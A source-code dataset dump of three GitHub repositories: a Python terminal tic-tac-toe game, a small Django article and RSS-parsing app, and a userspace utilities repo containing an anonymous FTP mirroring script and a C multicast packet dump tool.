Lap343/Tick-Tack-Toe_Game | https://github.com/Lap343/Tick-Tack-Toe_Game | 15bc24374c779264ea4b6e92b7ae1bfbe92b636a | 78ae4850c2129c657eda490efba9052fb1613c7b | 05175a30a8b1b386c215e6ae1c12b476c58702b8 | refs/heads/main | 2023-03-14T09:17:07.221109 | 2021-03-02T22:04:51 | 2021-03-02T22:04:51 | 343,925,411 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4891625642776489,
"alphanum_fraction": 0.5044335126876831,
"avg_line_length": 25.835617065429688,
"blob_id": "a2c0d7a4e69814f749d8b0d07727024b2a0c6383",
"content_id": "9760a6c7feb8699ef206f278836bf5e3511c5b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2030,
"license_type": "no_license",
"max_line_length": 347,
"num_lines": 73,
"path": "/game.py",
"repo_name": "Lap343/Tick-Tack-Toe_Game",
"src_encoding": "UTF-8",
"text": "restart_check = True\r\nog_game_board = ['1','2','3','4','5','6','7','8','9']\r\n\r\ndef display_game(game_board):\r\n print(f' | | \\n {game_board[0]} | {game_board[1]} | {game_board[2]} \\n | | \\n-----------------\\n | | \\n {game_board[3]} | {game_board[4]} | {game_board[5]} \\n | | \\n-----------------\\n | | \\n {game_board[6]} | {game_board[7]} | {game_board[8]} \\n | | \\n')\r\n\r\ndef player_input():\r\n choice = 'WRONG'\r\n\r\n while choice not in game_board:\r\n choice = input('Please choose a cell to change: ')\r\n if choice not in game_board and og_game_board:\r\n print('Please choose one of the numbers on the grid.')\r\n \r\n return int(choice) - 1\r\n\r\ndef turn_check(turn):\r\n if turn == True:\r\n return False\r\n else:\r\n return True\r\n\r\ndef replacement_choice(game_board,index_change,turn):\r\n if turn == True:\r\n game_board[index_change] = 'X'\r\n else:\r\n game_board[index_change] = 'O'\r\n\r\n return game_board\r\n\r\ndef gameon_check(turn_counter):\r\n if turn_counter < 9:\r\n print(turn_counter)\r\n return True\r\n else: \r\n return False\r\n\r\ndef restart_checking():\r\n choice = 'wrong'\r\n while choice not in ['Y','N']:\r\n choice = input('Play again? (Y or N) ')\r\n if choice not in ['Y','N']:\r\n print(\"Don't understand? Please choose 'Y' or 'N'\")\r\n\r\n if choice == 'Y':\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\nwhile restart_check == True:\r\n game_board = ['1','2','3','4','5','6','7','8','9']\r\n game_on = True\r\n turn_counter = 1\r\n turn = True\r\n \r\n display_game(og_game_board)\r\n\r\n while game_on:\r\n index_change = player_input()\r\n\r\n game_board = replacement_choice(game_board,index_change,turn)\r\n\r\n turn = turn_check(turn)\r\n\r\n display_game(game_board)\r\n\r\n game_on = gameon_check(turn_counter)\r\n\r\n turn_counter += 1\r\n\r\n restart_check = restart_checking()"
},
{
"alpha_fraction": 0.7543859481811523,
"alphanum_fraction": 0.7543859481811523,
"avg_line_length": 56,
"blob_id": "89c147a1b3f235470b5319f23cbb4e21c5442709",
"content_id": "47607fb6781d08b0f7bc5e114e385b8672e4e18f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Lap343/Tick-Tack-Toe_Game",
"src_encoding": "UTF-8",
"text": "# Tick-Tack-Toe_Game\nA tick-tack-toe game you play with someone else. You need to run it on the terminal to play.\n"
}
] | 2 |
denasanay/TestWork | https://github.com/denasanay/TestWork | b69c433f888bec0619e10f4ce6123b9f27a863df | ea380c2dd6123e55bbc60361831088c0f0a4c56e | e43790ba6d3636f4331f95b10b922ebd04b6d140 | refs/heads/master | 2016-08-11T12:04:47.106726 | 2015-05-20T19:27:12 | 2015-05-20T19:27:12 | 35,963,464 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6649746298789978,
"alphanum_fraction": 0.6649746298789978,
"avg_line_length": 31.83333396911621,
"blob_id": "5261ca11694a54ce5206889a76e433ae258c777f",
"content_id": "9b4d2378956f44a5fe7d93496ea89b9bb6d091bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/core/urls.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url, patterns\n\nurlpatterns = patterns(\n 'core.views',\n url(r'^articles/(?P<article_id>\\d+)/$', 'article_detail_view', name='article_detail_view'),\n )\n"
},
{
"alpha_fraction": 0.6859503984451294,
"alphanum_fraction": 0.6883116960525513,
"avg_line_length": 29.178571701049805,
"blob_id": "4b050e56d76bb9944c65cbd45b11defa1e6d14f1",
"content_id": "f6e0a9a2e865d451db0606bc4e2cdd93101eaa47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 847,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 28,
"path": "/core/views.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Article\nimport xml.etree.cElementTree as ET\nimport urllib3\n\n\ndef articles_list_view(request):\n articles_list = Article.objects.all()\n return render(request, 'articles_list.html', {'articles_list': articles_list})\n\n\ndef article_detail_view(request, article_id):\n article = Article.objects.get(id=article_id)\n return render(request, 'detail.html', {'article': article})\n\n\ndef article_parse(request):\n http = urllib3.PoolManager()\n xml_file = http.urlopen('GET', 'http://feeds.abcnews.com/abcnews/internationalheadlines', preload_content=False)\n tree = ET.ElementTree(file=xml_file)\n xmldata = []\n\n for elem in tree.iter(tag='title'):\n xmldata.append({\n 'title': elem.text,\n })\n\n return render(request, 'parse.html', {'items': xmldata})\n\n\n"
},
{
"alpha_fraction": 0.6395348906517029,
"alphanum_fraction": 0.6395348906517029,
"avg_line_length": 34.75,
"blob_id": "294ed830b941e14c6f3d4407cd6e3dc6a43fdf61",
"content_id": "797111ddebad447f07dd220ab3f77c2724cce6bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 12,
"path": "/TestWork/urls.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url, patterns\nfrom django.contrib import admin\n\nurlpatterns = patterns(\n '',\n url(r'^$', 'core.views.articles_list_view', name='articles_list_view'),\n url(r'^parse/$', 'core.views.article_parse', name='article_parse'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^auth/', include('loginsys.urls')),\n url(r'^add/', include('core.urls', namespace='core')),\n\n )\n\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7568627595901489,
"avg_line_length": 27.44444465637207,
"blob_id": "87420c3723e9b7ac638d4d0dc0af1074797176e4",
"content_id": "92ff8fcc292b9c877f80e220fca169818148f8c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/core/models.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\n# Create your models here.\n\n\nclass Article(models.Model):\n title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n created_at = models.DateTimeField()"
},
{
"alpha_fraction": 0.5188171863555908,
"alphanum_fraction": 0.5188171863555908,
"avg_line_length": 36.20000076293945,
"blob_id": "0f2e41dd7445f4521a45541859864856ab6dc7e6",
"content_id": "9c0e239a3d463a2180f89300717d7c405b7b25cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 10,
"path": "/loginsys/urls.py",
"repo_name": "denasanay/TestWork",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('',\n\n\n url(r'^login/$', 'loginsys.views.login', name='user_login'),\n url(r'^logout/$', 'loginsys.views.logout', name='user_logout'),\n url(r'^register/$', 'loginsys.views.register', name='user_register'),\n\n )\n"
}
] | 5 |
dduval/userspacecode | https://github.com/dduval/userspacecode | 8cca6cf2f39d27281a30081534a931bbb5ce0037 | e46c82f67c07f967a5ad264b03e9a6e9405aec3b | 6751c2749e77381c3c5d44ad3addda9cec190e9d | refs/heads/master | 2016-09-06T06:46:37.975544 | 2014-02-03T20:37:20 | 2014-02-03T20:37:20 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5436164140701294,
"alphanum_fraction": 0.5519930720329285,
"avg_line_length": 25.427480697631836,
"blob_id": "88e681ebe0d71fe1c340d09615e798b474117304",
"content_id": "3bc86cb6debb73c7166b1490ceda9d8d8c6f2138",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3462,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 131,
"path": "/python/ftpsync.py",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\n\n\"\"\" Mirror a remote ftp dir into a local directory tree (files only)\n\nftpsync.py -s <ftpsite> -f <ftpdir> -l <localdir> -p <pattern>\n\nExample:\n\n ./ftpsync.py -s ftp.redhat.com -f /pub/redhat/linux/updates/enterprise/4AS/en/os/SRPMS/ -l /tmp/ -p kernel-utils*\n\"\"\"\n\n# Copyright Dominic Duval <[email protected]> according to the terms\n# of the GNU Public License.\n \nimport os\nimport sys\nimport getopt\nimport ftplib\nfrom fnmatch import fnmatch\n\n# Print usage message and exit\ndef usage():\n sys.stdout = sys.stderr\n print __doc__\n sys.exit(2)\n\ndef ftpsync(ftphost,remotedir,localdir,pattern):\n verbose=2\n login='anonymous'\n passwd='[email protected]'\n account=''\n host='ftp.redhat.com'\n\n \n f = ftplib.FTP()\n if verbose > 1: print \"Connecting to '%s'...\" % host\n f.connect(host)\n if verbose > 1:\n print 'Logging in as %r...' % (login or 'anonymous')\n f.login(login, passwd, account)\n pwd = f.pwd()\n f.cwd(remotedir)\n pwd = f.pwd()\n if verbose > 1: print 'PWD =', repr(pwd)\n\n if localdir and not os.path.isdir(localdir):\n if verbose > 1: print 'Creating local directory', repr(localdir)\n try:\n makedir(localdir)\n except os.error, msg: \n print \"Failed to establish local directory\", repr(localdir)\n return\n\n listing = []\n f.retrlines('LIST', listing.append)\n\n for line in listing:\n if verbose > 3: print 'processing %s' % line\n words = line.split(None, 8)\n if len(words) < 6:\n if verbose > 1: print 'Skipping short line'\n continue\n filename = words[-1].lstrip()\n infostuff = words[-5:-1]\n mode = words[0]\n\n # See if the file matches our pattern\n if verbose > 3: print \"%s %s\" % (filename, pattern)\n if not fnmatch(filename, pattern):\n continue\n if verbose > 1: print 'Match for %s' % filename\n if mode[0] == 'd':\n continue\n if mode[0] == 'l':\n continue\n\n fullname = os.path.join(localdir, filename)\n #Create new file and retreive content\n if os.path.isfile(fullname):\n if verbose > 1: print '%s already exists' % fullname\n continue\n try:\n fp = open( fullname , 'wb')\n except IOError, msg:\n print \"Can't create %r: %s\" % (filename, msg)\n continue\n if verbose > 1:\n print 'Retrieving %r from %r ...' % (filename, pwd) \n try:\n f.retrbinary('RETR ' + filename, fp.write, 8*1024)\n except ftplib.error_perm, msg:\n print msg\n fp.close()\n return len(listing) \n\n\ndef main(args):\n ftpsite=''\n ftpdir=''\n localdir=''\n pattern=''\n try:\n opts, args = getopt.getopt(args,\"hs:f:l:p:\")\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n usage() \n sys.exit()\n elif opt in (\"-s\"):\n ftpsite = arg\n elif opt in (\"-f\"):\n ftpdir = arg\n elif opt in (\"-l\"):\n localdir = arg\n elif opt in (\"-p\"):\n pattern = arg\n\n print 'FTP site is', ftpsite\n print 'FTP directory is', ftpdir\n print 'Local directory is', localdir\n print 'Search pattern is', pattern\n \n ftpsync(ftpsite, ftpdir, localdir, pattern)\n\n\nif __name__ == \"__main__\":\n verbose=2\n main(sys.argv[1:])\n"
},
{
"alpha_fraction": 0.571353554725647,
"alphanum_fraction": 0.5918403267860413,
"avg_line_length": 23.504291534423828,
"blob_id": "1651534a8d87fde10103ba34fbc078463275c776",
"content_id": "e43bbb110cf03864038defb28f455ff14544da9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 11422,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 466,
"path": "/multidump.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2009 Dominic Duval, Red Hat Inc.\n *\n * multidump :\n * Receive multicast messages based on command line arguments\n *\n * USAGE: ./multidump\n *\n * EXAMPLE: ./mdump -p0 -Q2 -r200000 224.0.55.55 12965\n *\n * Inspired from 29West.com's msend and mdump\n */\n\n\n\n#include <stdio.h>\n#include <stdlib.h>\n\nextern int optind;\nextern int optreset;\nextern char *optarg;\nint getopt(int nargc, char * const *nargv, const char *ostr);\n\n#include <signal.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <arpa/inet.h>\n#include <errno.h>\n#include <pthread.h>\n#define SLEEP_SEC(s) sleep(s)\n#define SLEEP_MSEC(s) usleep((s) * 1000)\n#define SLEEP_USEC(s) usleep(s)\n#define CLOSESOCKET close\n#define ERRNO errno\n#define SOCKET int\n#define INVALID_SOCKET -1\n#define SOCKET_ERROR -1\n#define TLONGLONG signed long long\n\n#include <sys/time.h>\n\n#include <string.h>\n#include <time.h>\n\n#define MAXPDU 65536\n\n\n/* program name (from argv[0] */\nchar *prog_name = \"xxx\";\n\n/* program options */\nint o_quiet_lvl;\nint o_rcvbuf_size;\nint o_pause_ms;\nint o_verify;\nint o_stop;\nint o_log;\n\n/* program positional parameters */\nunsigned long int groupaddr;\nunsigned short int groupport;\nchar *bind_if;\n\n\nchar usage_str[] = \"[-h] [-q] [-Q Quiet_lvl] [-r rcvbuf_size] [-p pause_ms] [-v] [-s] group port [interface]\";\n\nvoid usage(char *msg)\n{\n\tif (msg != NULL)\n\t\tfprintf(stderr, \"\\n%s\\n\\n\", msg);\n\tfprintf(stderr, \"Usage: %s %s\\n\\n\"\n\t\t\t\"(use -h for detailed help)\\n\",\n\t\t\tprog_name, usage_str);\n} /* usage */\n\n\nvoid help(char *msg)\n{\n\tif (msg != NULL)\n\t\tfprintf(stderr, \"\\n%s\\n\\n\", msg);\n\tfprintf(stderr, \"Usage: %s %s\\n\", prog_name, usage_str);\n\tfprintf(stderr, \"Where:\\n\"\n\t\t\t\" -h : help\\n\"\n\t\t\t\" -q : no print per datagram (same as '-Q 2')\\n\"\n\t\t\t\" -Q Quiet_lvl : set quiet level [0] :\\n\"\n\t\t\t\" 0 - print full datagram contents\\n\"\n\t\t\t\" 1 - print datagram summaries\\n\"\n\t\t\t\" 2 - no print per datagram (same as '-q')\\n\"\n\t\t\t\" -r rcvbuf_size : size (bytes) of UDP receive buffer (SO_RCVBUF) [4194304]\\n\"\n\t\t\t\" (use 0 for system default buff size)\\n\"\n\t\t\t\" -p pause_ms : milliseconds to pause after each receive [0 : no pause]\\n\"\n\t\t\t\" -v : verify the sequence numbers\\n\"\n\t\t\t\" -s : stop execution when status msg received\\n\"\n\t\t\t\" -l : log packets\\n\"\n\t\t\t\"\\n\"\n\t\t\t\" group : multicast address to send on\\n\"\n\t\t\t\" port : destination port\\n\"\n\t\t\t\" interface : optional IP addr of local interface (for multi-homed hosts) [INADDR_ANY]\\n\"\n\t);\n} /* help */\n\n\n/* faster routine to replace inet_ntoa() (from tcpdump) */\nchar *intoa(unsigned int addr)\n{\n\tregister char *cp;\n\tregister unsigned int byte;\n\tregister int n;\n\tstatic char buf[sizeof(\".xxx.xxx.xxx.xxx\")];\n\n\taddr = ntohl(addr);\n\t// NTOHL(addr);\n\tcp = &buf[sizeof buf];\n\t*--cp = '\\0';\n\n\tn = 4;\n\tdo {\n\t\tbyte = addr & 0xff;\n\t\t*--cp = byte % 10 + '0';\n\t\tbyte /= 10;\n\t\tif (byte > 0) {\n\t\t\t*--cp = byte % 10 + '0';\n\t\t\tbyte /= 10;\n\t\t\tif (byte > 0)\n\t\t\t\t*--cp = byte + '0';\n\t\t}\n\t\t*--cp = '.';\n\t\taddr >>= 8;\n\t} while (--n > 0);\n\n\treturn cp + 1;\n} /* intoa */\n\n\nchar *format_time(const struct timeval *tv)\n{\n\tstatic char buff[sizeof(\".xx:xx:xx.xxxxxx\")];\n\tint min;\n\n\tunsigned int h = localtime((time_t *)&tv->tv_sec)->tm_hour;\n\tmin = (int)(tv->tv_sec % 86400);\n\tsprintf(buff,\"%02d:%02d:%02d.%06d\",h,(min%3600)/60,min%60,tv->tv_usec);\n\treturn buff;\n} /* format_time */\n\n\nvoid dump(const char *buffer, int size)\n{\n\tint i,j;\n\tunsigned char c;\n\tchar textver[20];\n\n\tfor (i=0;i<(size >> 4);i++) {\n\t\tfor (j=0;j<16;j++) {\n\t\t\tc = buffer[(i << 4)+j];\n\t\t\tprintf(\"%02x \",c);\n\t\t\ttextver[j] = ((c<0x20)||(c>0x7e))?'.':c;\n\t\t}\n\t\ttextver[j] = 0;\n\t\tprintf(\"\\t%s\\n\",textver);\n\t}\n\tfor (i=0;i<size%16;i++) {\n\t\tc = buffer[size-size%16+i];\n\t\tprintf(\"%02x \",c);\n\t\ttextver[i] = ((c<0x20)||(c>0x7e))?'.':c;\n\t}\n\tfor (i=size%16;i<16;i++) {\n\t\tprintf(\" \");\n\t\ttextver[i] = ' ';\n\t}\n\ttextver[i] = 0;\n\tprintf(\"\\t%s\\n\",textver);\n\tfflush(stdout);\n} /* dump */\n\n\nvoid currenttv(struct timeval *tv)\n{\n\tgettimeofday(tv,NULL);\n} /* currenttv */\n\n\nint main(int argc, char **argv)\n{\n\tint opt;\n\tint num_parms;\n\tchar equiv_cmd[1024];\n\tchar *buff;\n\tSOCKET sock;\n\tsocklen_t fromlen = sizeof(struct sockaddr_in);\n\tint default_rcvbuf_sz, cur_size, sz;\n\tint num_rcvd;\n\tstruct sockaddr_in name;\n\tstruct sockaddr_in src;\n\tstruct ip_mreq imr;\n\tstruct timeval tv;\n\tint num_sent;\n\tfloat perc_loss;\n\tint cur_seq;\n\tstruct iovec iov;\n\tssize_t iovnr;\n\tint iovfd;\n\tchar strbuffer[1000];\n\n\tprog_name = argv[0];\n\n\n\tif (o_log == 1) {\n\t\tiov.iov_base=strbuffer;\n\t\tiov.iov_len=0; //To be defined latter.\n\t\tiovfd= open (\"log.out\", O_WRONLY | O_CREAT | O_TRUNC);\n\t\tif (iovfd == -1) {\n\t\t\tperror (\"open error\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\n\tbuff = malloc(65536 + 1); /* one extra for trailing null (if needed) */\n\tif (buff == NULL) { fprintf(stderr, \"malloc failed\\n\"); exit(1); }\n\n\tsignal(SIGPIPE, SIG_IGN);\n\n\tif((sock = socket(PF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"socket\");\n\t\texit(1);\n\t}\n\tsz = sizeof(default_rcvbuf_sz);\n\tif (getsockopt(sock,SOL_SOCKET,SO_RCVBUF,(char *)&default_rcvbuf_sz,\n\t\t\t(unsigned int *)&sz) == SOCKET_ERROR) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"getsockopt - SO_RCVBUF\");\n\t\texit(1);\n\t}\n\n\t/* default values for options */\n\to_quiet_lvl = 0;\n\to_rcvbuf_size = 0x400000; /* 4MB */\n\to_pause_ms = 0;\n\to_verify = 0;\n\to_stop = 0;\n\to_log = 0;\n\n\t/* default values for optional positional params */\n\tbind_if = NULL;\n\n\twhile ((opt = getopt(argc, argv, \"hqQ:p:r:vsl\")) != EOF) {\n\t\tswitch (opt) {\n\t\t case 'h':\n\t\t\thelp(NULL); exit(0);\n\t\t\tbreak;\n\t\t case 'q':\n\t\t\to_quiet_lvl = 2;\n\t\t\tbreak;\n\t\t case 'Q':\n\t\t\to_quiet_lvl = atoi(optarg);\n\t\t\tbreak;\n\t\t case 'p':\n\t\t\to_pause_ms = atoi(optarg);\n\t\t\tbreak;\n\t\t case 'r':\n\t\t\to_rcvbuf_size = atoi(optarg);\n\t\t\tif (o_rcvbuf_size == 0)\n\t\t\t\to_rcvbuf_size = default_rcvbuf_sz;\n\t\t\tbreak;\n\t\t case 'v':\n\t\t\to_verify = 1;\n\t\t\tbreak;\n\t\t case 's':\n\t\t\to_stop = 1;\n\t\t\tbreak;\n\t\t case 'l':\n\t\t\to_log = 1;\n\t\t default:\n\t\t\tusage(\"unrecognized option\");\n\t\t\texit(1);\n\t\t\tbreak;\n\t\t} /* switch */\n\t} /* while opt */\n\n\tnum_parms = argc - optind;\n\t\n\tif (o_log == 1) {\n\t\tiov.iov_base=strbuffer;\n\t\tiov.iov_len=0; //To be defined latter.\n\t\tiovfd= open (\"log.out\", O_WRONLY | O_CREAT | O_TRUNC);\n\t\tif (iovfd == -1) {\n\t\t\tperror (\"open error\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\n\t/* handle positional parameters */\n\tif (num_parms == 2) {\n\t\tgroupaddr = inet_addr(argv[optind]);\n\t\tgroupport = (unsigned short)atoi(argv[optind+1]);\n\t\tsprintf(equiv_cmd, \"mdump -p%d -Q%d -r%d %s%s%s %s\",\n\t\t\t\to_pause_ms, o_quiet_lvl, o_rcvbuf_size,\n\t\t\t\to_verify ? \"-v \" : \"\",\n\t\t\t\to_stop ? \"-s \" : \"\",\n\t\t\t\targv[optind],argv[optind+1]);\n\t\tprintf(\"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stderr);\n\t} else if (num_parms == 3) {\n\t\tgroupaddr = inet_addr(argv[optind]);\n\t\tgroupport = (unsigned short)atoi(argv[optind+1]);\n\t\tbind_if = argv[optind+2];\n\t\tsprintf(equiv_cmd, \"mdump -p%d -Q%d -r%d %s%s %s %s\",\n\t\t\t\to_pause_ms, o_quiet_lvl, o_rcvbuf_size,\n\t\t\t\to_verify ? \"-v \" : \"\",\n\t\t\t\targv[optind],argv[optind+1],argv[optind+2]);\n\t\tprintf(\"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"Equiv cmd line: %s\\n\", equiv_cmd);\n\t\tfflush(stderr);\n\t} else {\n\t\tusage(\"need 2-3 positional parameters\");\n\t\texit(1);\n\t}\n\n\tif(setsockopt(sock,SOL_SOCKET,SO_RCVBUF,(const char *)&o_rcvbuf_size,\n\t\t\tsizeof(o_rcvbuf_size)) == SOCKET_ERROR) {\n\t\tprintf(\"WARNING: setsockopt - SO_RCVBUF\\n\");\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"WARNING: \"); perror(\"setsockopt - SO_RCVBUF\");\n\t\tfflush(stderr);\n\t}\n\tsz = sizeof(cur_size);\n\tif (getsockopt(sock,SOL_SOCKET,SO_RCVBUF,(char *)&cur_size,\n\t\t\t(unsigned int *)&sz) == SOCKET_ERROR) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"getsockopt - SO_RCVBUF\");\n\t\texit(1);\n\t}\n\tif (cur_size < o_rcvbuf_size) {\n\t\tprintf(\"WARNING: tried to set SO_RCVBUF to %d, only got %d\\n\",\n\t\t\t\to_rcvbuf_size, cur_size);\n\t\tfflush(stdout);\n\t\tfprintf(stderr, \"WARNING: tried to set SO_RCVBUF to %d, only got %d\\n\",\n\t\t\t\to_rcvbuf_size, cur_size);\n\t\tfflush(stderr);\n\t}\n\n\tmemset((char *)&imr,0,sizeof(imr));\n\timr.imr_multiaddr.s_addr = groupaddr;\n\tif (bind_if != NULL) {\n\t\timr.imr_interface.s_addr = inet_addr(bind_if);\n\t} else {\n\t\timr.imr_interface.s_addr = htonl(INADDR_ANY);\n\t}\n\n\topt = 1;\n\tif (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (char *)&opt, sizeof(opt)) == SOCKET_ERROR) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"setsockopt SO_REUSEADDR\");\n\t\texit(1);\n\t}\n\n\tmemset((char *)&name,0,sizeof(name));\n\tname.sin_family = AF_INET;\n\tname.sin_addr.s_addr = groupaddr;\n\tname.sin_port = htons(groupport);\n\tif (bind(sock,(struct sockaddr *)&name,sizeof(name)) == SOCKET_ERROR) {\n\t\tname.sin_addr.s_addr = htonl(INADDR_ANY);\n\t\tif (bind(sock,(struct sockaddr *)&name, sizeof(name)) == -1) {\n\t\t\tfprintf(stderr, \"ERROR: \"); perror(\"bind\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\tif (setsockopt(sock,IPPROTO_IP,IP_ADD_MEMBERSHIP,\n\t\t\t\t(char *)&imr,sizeof(struct ip_mreq)) == SOCKET_ERROR ) {\n\t\tfprintf(stderr, \"ERROR: \"); perror(\"setsockopt - IP_ADD_MEMBERSHIP\");\n\t\texit(1);\n\t}\n\n\tcur_seq = 0;\n\tnum_rcvd = 0;\n\tfor (;;) {\n\t\tcur_size = recvfrom(sock,buff,65536,0,\n\t\t\t\t(struct sockaddr *)&src,&fromlen);\n\t\tif (cur_size == SOCKET_ERROR) {\n\t\t\tfprintf(stderr, \"ERROR: \"); perror(\"recv\");\n\t\t\texit(1);\n\t\t}\n\n\t\tif (o_log == 1 ) {\n\t\t\tcurrenttv(&tv);\n\t\t\tsprintf(strbuffer, \"%s %s.%d %d bytes:\\n\",\n\t\t\t\tformat_time(&tv), inet_ntoa(src.sin_addr),\n\t\t\t\tntohs(src.sin_port), cur_size);\n\t\t\t\n\t\t}\n\n\t\tif (o_quiet_lvl == 0) { /* non-quiet: print full dump */\n\t\t\tcurrenttv(&tv);\n\t\t\tprintf(\"%s %s.%d %d bytes:\\n\",\n\t\t\t\t\tformat_time(&tv), inet_ntoa(src.sin_addr),\n\t\t\t\t\tntohs(src.sin_port), cur_size);\n\t\t\tdump(buff,cur_size);\n\t\t}\n\t\tif (o_quiet_lvl == 1) { /* semi-quiet: print datagram summary */\n\t\t\tcurrenttv(&tv);\n\t\t\tprintf(\"%s %s.%d %d bytes\\n\", /* no colon */\n\t\t\t\t\tformat_time(&tv), inet_ntoa(src.sin_addr),\n\t\t\t\t\tntohs(src.sin_port), cur_size);\n\t\t\tfflush(stdout);\n\t\t}\n\n\t\tif (o_pause_ms > 0) {\n\t\t\tSLEEP_USEC(o_pause_ms);\n\t\t}\n\n\t\tif (cur_size > 5 && memcmp(buff, \"echo \", 5) == 0) {\n\t\t\t/* echo command */\n\t\t\tbuff[cur_size] = '\\0'; /* guarantee trailing null */\n\t\t\tif (buff[cur_size - 1] == '\\n')\n\t\t\t\tbuff[cur_size - 1] = '\\0'; /* strip trailing nl */\n\t\t\tprintf(\"%s\\n\", buff);\n\t\t\tfflush(stdout);\n\t\t\tfprintf(stderr, \"%s\\n\", buff);\n\t\t\tfflush(stderr);\n\t\t}\n\t\telse if (cur_size > 5 && memcmp(buff, \"stat \", 5) == 0) {\n\t\t\t/* when sender tells us to, calc and print stats */\n\t\t\tbuff[cur_size] = '\\0'; /* guarantee trailing null */\n\t\t\t/* 'stat' message contains num msgs sent */\n\t\t\tnum_sent = atoi(&buff[5]);\n\t\t\tperc_loss = (float)(num_sent - num_rcvd) * 100.0 / (float)num_sent;\n\t\t\tprintf(\"%d msgs sent, %d received (not including 'stat')\\n\",\n\t\t\t\t\tnum_sent, num_rcvd);\n\t\t\tprintf(\"%f%% loss\\n\", perc_loss);\n\t\t\tfflush(stdout);\n\t\t\tfprintf(stderr, \"%d msgs sent, %d received (not including 'stat')\\n\",\n\t\t\t\t\tnum_sent, num_rcvd);\n\t\t\tfprintf(stderr, \"%f%% loss\\n\", perc_loss);\n\t\t\tfflush(stderr);\n\n\t\t\tif (o_stop)\n\t\t\t\texit(0);\n\n\t\t\t/* reset stats */\n\t\t\tnum_rcvd = 0;\n\t\t\tcur_seq = 0;\n\t\t}\n\t\telse { /* not a cmd */\n\t\t\tif (o_verify) {\n\t\t\t\tbuff[cur_size] = '\\0'; /* guarantee trailing null */\n\t\t\t\tif (cur_seq != strtol(&buff[8], NULL, 16)) {\n\t\t\t\t\tprintf(\"Expected seq %x (hex), got %s\\n\", cur_seq, &buff[8]);\n\t\t\t\t\tfflush(stdout);\n\t\t\t\t\t/* resyncronize sequence numbers in case there is loss */\n\t\t\t\t\tcur_seq = strtol(&buff[8], NULL, 16);\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t++num_rcvd;\n\t\t\t++cur_seq;\n\t\t}\n\t} /* for ;; */\n\n\tCLOSESOCKET(sock);\n\n\texit(0);\n} /* main */\n\n\n\n"
},
{
"alpha_fraction": 0.5048643350601196,
"alphanum_fraction": 0.5299538969993591,
"avg_line_length": 24.6842098236084,
"blob_id": "2cbd05b4b1dfe1dea4bef6ff998f608f6f7cccfb",
"content_id": "e05b7e3fd4025d8fb63eabec0991ac57e74fa9aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1953,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 76,
"path": "/clock.cpp",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
